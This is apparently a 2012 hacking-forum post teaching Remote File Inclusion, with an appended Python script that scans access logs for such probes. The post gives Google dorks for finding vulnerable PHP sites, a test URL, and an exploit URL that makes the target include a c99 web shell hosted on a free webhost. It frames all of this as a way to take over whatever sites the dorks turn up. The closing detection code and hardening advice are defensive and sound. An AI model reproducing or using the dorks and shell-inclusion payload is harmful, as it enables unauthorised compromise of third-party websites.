RFI 11-08-2012, 12:21 PM
#1
I haven't seen a tutorial about RFI here, so I decided to write one.
You will need a shell and a free webhost that won't delete your account for the shell.
http://www.7host.com this is the host I recommend; you can try cwahi.com, but the last time they deleted my account.
You will need dorks to find a vulnerable site, which is hard these days ;(
Here are some:
Code:
inurl:.php?link=
allinurl:.php?link=
inurl:.php?redirect=
allinurl:.php?redirect=
inurl:.php?page=
allinurl:.php?page=
inurl:.php?webpage=
allinurl:.php?webpage=
What is RFI
Code:
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.
-Wikipedia
To test a site for the vulnerability, write http://google.com after the =; if Google loads, then the site is vulnerable.
Example
Code:
http://www.site.com/index.php?page=web.php
TEST
http://www.site.com/index.php?page=http://google.com
To exploit the vulnerability you just need to replace google with the address of your shell.
Example
Code:
My shell link for example
http://www.host.com/c99.asp
http://www.site.com/index.php?page=http://www.host.com/c99.asp
And if the site is vulnerable, your shell will be loaded.
It's really hard to find RFI since the PHP 5.5 update; many people say that it's 'dead'.
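
From the defender's side, the probe shown in the post (a `page=` parameter carrying a full URL) stands out in web-server access logs. The following is an added example, not part of the original post: it flags query parameters whose decoded value starts with a remote scheme or PHP wrapper. The log lines, the host `host.example` and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Schemes/wrappers that make a PHP include() read non-local content.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect)://|^\s*data:", re.I)
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_candidates(log_line):
    """Return [(param, decoded_value)] for query parameters that hold a remote URL."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = fully_unquote(value)  # parse_qsl already removed one layer
        if REMOTE_VALUE.match(decoded):
            hits.append((name, decoded))
    return hits

SAMPLE_LOG = [  # constructed access-log lines, not taken from a real server
    '203.0.113.5 - - [08/Nov/2012:12:21:00 +0000] "GET /index.php?page=web.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Nov/2012:12:22:10 +0000] "GET /index.php?page=http://google.com HTTP/1.1" 200 9000',
    '203.0.113.9 - - [08/Nov/2012:12:22:40 +0000] "GET /index.php?page=hTTp%253A%252F%252Fhost.example%252Fx.txt%3F HTTP/1.1" 200 40',
    '203.0.113.7 - - [08/Nov/2012:12:23:00 +0000] "GET /index.php?id=4&page=php://input HTTP/1.1" 200 40',
]

def scan(lines):
    """Map 1-based line numbers to the suspicious parameters found on that line."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := rfi_candidates(line))}

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

A hit on a `redirect=` or `link=` parameter can be a legitimate redirect, so treat the results as triage candidates. The include itself is closed off by keeping PHP's `allow_url_include` set to Off and mapping the parameter to a fixed allowlist of local files.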